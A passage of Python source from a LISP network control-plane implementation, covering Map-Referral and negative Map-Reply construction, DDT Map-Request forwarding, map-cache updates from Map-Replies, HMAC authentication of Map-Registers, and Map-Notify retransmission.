return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk the cache looking for the shortest prefix that does NOT match any
# configured site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporarily return the requested prefix until lisp_ms_compute_
# neg_prefix() is working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Referral or Map-Reply has been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
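#
# Illustration of the selection above: if three referral-nodes share the
# best priority, ref_set has length 3 and the node returned is
# ref_set[dest_eid.hash_address(source_eid) % 3]. The hash keeps the choice
# stable for a given (source-EID, dest-EID) pair while spreading different
# pairs across the equal-priority referral-nodes.
#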
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If the caller wants us to use the root instead of a best-match lookup.
# We only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by a Map-Resolver from an ITR. We forward the
# Map-Request to the longest-matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If this is a negative Map-Reply and it came from a Map-Resolver, do some
# counting and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data is included in the RLOC record.
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for the RLOC-probe reply from this specific RLOC and
# update RLOC state for the map-cache entry. Ignore an RLOC with a
# different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private-address RLOC unreachable in the two latter cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# An RTR should not put RTR RLOCs in its map-cache, but xTRs do.
# Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from the packet contents stored in lisp_map_register() and
# encode it in the packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print both hash values if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
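#
# Minimal standalone sketch (assuming SHA-256 auth) of the check performed
# by lisp_verify_auth() above. It uses only the standard hmac/hashlib
# modules; the function name and parameters are illustrative and are not
# referenced anywhere else.
#
def lisp_example_verify_sha256_auth(zeroed_packet, packet_auth_hex, password):
    import hmac
    import hashlib

    #
    # Compute the hex digest over the packet with the auth-data field zeroed,
    # as lisp_hash_me() does for LISP_SHA_256_128_ALG_ID.
    #
    computed = hmac.new(password, zeroed_packet, hashlib.sha256).hexdigest()

    #
    # Compare against the hex auth-data carried in the Map-Register.
    #
    return(computed == packet_auth_hex)
#enddef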
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack, so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change the Map-Notify message to have a new type (Map-Notify-Ack) and
# re-authenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
